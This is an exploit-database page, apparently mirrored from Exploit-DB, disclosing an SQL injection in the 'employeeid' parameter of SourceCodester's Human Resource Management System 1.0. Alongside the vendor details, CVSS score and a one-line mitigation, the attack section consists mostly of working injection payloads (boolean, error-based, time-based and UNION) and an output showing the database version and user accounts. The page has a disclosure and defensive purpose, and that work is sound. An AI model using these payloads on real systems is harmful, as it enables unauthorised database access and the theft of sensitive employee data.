header-logo
Suggest Exploit
vendor:
Human Resource Management System
by:
Srikar
6.1
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Human Resource Management System
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE: a:sourcecodester:human_resource_management_system:1.0
Metasploit:
Other Scripts:
Platforms Tested: Windows
2024

Human Resource Management System – SQL Injection

The Human Resource Management System project in PHP and MySQL version 1.0 is vulnerable to SQL injection through the 'employeeid' parameter. By injecting malicious SQL payloads, an attacker can manipulate the database and potentially extract sensitive information. This exploit has been successfully tested on Windows 10 Pro running XAMPP V3.3.0.

Mitigation:

To mitigate this vulnerability, it is recommended to use parameterized queries or prepared statements to sanitize user input and prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Human Resource Management System - SQL Injection
# Date: 13-01-2024
# Exploit Author: Srikar ( Exp1o1t9r )
# Vendor Homepage: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html
# Software Link: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html
# https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip
# Version: 1.0 (Monday, October 10, 2022 - 13:37)
# Tested On: Windows 10 Pro 10.0.19044 N/A Build 1288 + XAMPP V3.3.0
# Vulnerable URL and Parameter:URL:


Parameter: employeeid=2 The following payloads successfully identified SQL injection
vulnerabilities:
employeeid=2' AND 9667=9667-- NFMgemployeeid=2' AND (SELECT
6014 FROM(SELECT COUNT(*),CONCAT(0x716a767671,(SELECT
(ELT(6014=6014,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ywfiemployeeid=2' AND (SELECT
7160 FROM (SELECT(SLEEP([SLEEPTIME])))IzXD)-- ninWemployeeid=-4254' UNION
ALL SELECT
NULL,CONCAT(0x716a767671,0x457977584e79636568687641497a4b6e637668455a487948534e50737753626f5a4a545244616276,0x7162716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
- *

# Response:MySQL: 10.4.32-MariaDB
Users:'pma'@'localhost''root'@'127.0.0.1''root'@'::1''root'@'localhost'*

Navigation

Suggest Exploit

Services By CQR